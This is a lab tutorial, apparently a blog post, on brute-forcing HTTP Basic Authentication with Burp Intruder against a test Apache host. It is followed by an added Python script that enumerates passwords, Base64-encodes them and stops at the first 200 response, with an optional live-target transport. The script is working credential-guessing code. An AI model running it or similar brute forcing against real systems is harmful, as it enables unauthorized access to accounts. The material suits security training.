Monday, April 2, 2018
HTTP Basic Authentication bruteforce attack with Burp proxy
- Layout for this exercise:
- This exercise is based on the previous post Setting up HTTP Basic Authentication.
- In this case the goal is to brute-force HTTP Basic Authentication using Burp Suite's Proxy and Intruder.
- First of all, let's manually configure a proxy in the Firefox browser on Kali Linux.
- Firefox -> Preferences -> Advanced -> Network -> Connection Settings:
- Manual proxy configuration: proxy listening on localhost, port 8080:
- Launching Burp:
- Options tab: checking that the proxy is listening on the localhost interface at port 8080:
- Connecting the browser to the web page protected with Basic Authentication:
- Burp intercepts the request to the web page:
- Forwarding the request:
- The Apache web server responds with a 401 "Authentication Required" message. Let's enter some arbitrary credentials, for instance "asdfg:asdfg":
- Burp intercepts the request carrying those credentials (Base64-encoded in the Authorization header):
- Now, Burp will help us craft those credentials. For that purpose, the request is sent to Intruder:
- The target of the attack is www.whitelist.com:
- The Positions tab is used to specify where the payload is inserted. Base64-decoding the value of the Authorization header reveals the fake credentials "asdfg:asdfg":
- The username:password value is marked as the payload position by enclosing it between section signs (§):
- In the Payloads tab, the payload type is set to Brute forcer.
- In this example the character set is deliberately tiny, just 2 letters (ab), and both the minimum and the maximum length are 5.
- Adding a processing rule for the prefix "admin:", corresponding to the username:
- Adding a processing rule for Base64 encoding, used by Basic Authentication:
- The two rules for processing the payload:
- It is also very important to remove the character = from the list of characters that Burp URL-encodes in the Payload Encoding section: = is used by Base64 for padding, and if it were sent as %3D the server would fail to decode the header and every try would return 401:
- The attack is ready to be started:
- Because the charset has 2 characters and the length is fixed at 5, the total number of tries will be 2^5 = 32.
- The attack starts, and the response status is 401 for every try until a 200 answer is received. The 200 response corresponds to the successful try:
- Decoding with Base64:
- The result is the correct credentials "admin:ababa":
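The same attack, written in plain Python as an added example (this is not code from the original post or from Burp): it enumerates the Brute forcer payload set, applies the two processing rules (prefix "admin:", then Base64), and stops at the first 200 response. The target is a constructed in-memory stand-in for the Apache host that validates Basic Auth the way the server does; `http_send` is an optional transport for a live target and is not exercised offline. The credential "admin:ababa", the charset and the lengths are the ones used above, and it also shows why leaving = in Intruder's URL-encode list breaks the attack.

```python
"""Brute-force HTTP Basic Authentication the way the Burp Intruder setup above does.

Added example, not the original post's code. The valid credential "admin:ababa",
charset "ab" and length 5 are taken from the exercise; the fake server is constructed.
"""
import base64
import binascii
import itertools
import urllib.error
import urllib.request
from typing import Callable, Iterator, Optional, Tuple

USERNAME = "admin"       # the "admin:" prefix processing rule
CHARSET = "ab"           # Brute forcer character set
MIN_LEN = MAX_LEN = 5    # Brute forcer minimum / maximum length


def candidate_passwords(charset: str = CHARSET, min_len: int = MIN_LEN,
                        max_len: int = MAX_LEN) -> Iterator[str]:
    """Same enumeration as Burp's Brute forcer payload type (2^5 = 32 strings here)."""
    for length in range(min_len, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            yield "".join(combo)


def basic_auth_header(username: str, password: str) -> str:
    """Apply the two processing rules: prefix 'username:' then Base64-encode."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode("ascii")
    return f"Basic {token}"


def naive_url_encode_equals(header: str) -> str:
    """What Intruder would send if '=' stayed in the URL-encode list: padding becomes %3D."""
    return header.replace("=", "%3D")


def parse_basic_auth(header: str) -> Optional[Tuple[str, str]]:
    """Server-side parsing: 'Basic <base64(user:pass)>'. Returns None when malformed."""
    scheme, _, token = header.partition(" ")
    if scheme != "Basic":
        return None
    try:
        decoded = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None  # e.g. '%3D' is not in the Base64 alphabet
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def fake_server(valid_user: str = "admin",
                valid_password: str = "ababa") -> Callable[[str], int]:
    """Constructed stand-in for the Apache host: returns 200 or 401 for an Authorization header."""
    def respond(auth_header: str) -> int:
        return 200 if parse_basic_auth(auth_header) == (valid_user, valid_password) else 401
    return respond


def http_send(url: str) -> Callable[[str], int]:
    """Real transport for a live target (hypothetical URL, not run offline)."""
    def respond(auth_header: str) -> int:
        req = urllib.request.Request(url, headers={"Authorization": auth_header})
        try:
            with urllib.request.urlopen(req, timeout=5) as resp:
                return resp.status
        except urllib.error.HTTPError as err:
            return err.code
    return respond


def brute_force(send: Callable[[str], int], username: str = USERNAME,
                charset: str = CHARSET, min_len: int = MIN_LEN,
                max_len: int = MAX_LEN) -> Tuple[int, Optional[str]]:
    """Try every candidate until a 200; returns (attempts, 'user:pass' or None)."""
    attempts = 0
    for password in candidate_passwords(charset, min_len, max_len):
        attempts += 1
        if send(basic_auth_header(username, password)) == 200:
            return attempts, f"{username}:{password}"
    return attempts, None


if __name__ == "__main__":
    server = fake_server()
    print(brute_force(server))                       # (11, 'admin:ababa')
    good = basic_auth_header("admin", "ababa")       # 'Basic YWRtaW46YWJhYmE='
    print(good, server(good))                        # 200
    print(server(naive_url_encode_equals(good)))     # 401: padding was mangled to %3D
```

To run it against the real lab host, pass `http_send("http://www.whitelist.com/")` to `brute_force` instead of `fake_server()`. With the charset sorted as "ab", "ababa" is the 11th candidate, so the run stops after 11 of the 32 tries.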
- The web server responds, as expected, with the HTML code of the web page:
- Removing the proxy configuration from the browser:
- Finally, authenticating with the correct credentials, the web page is available: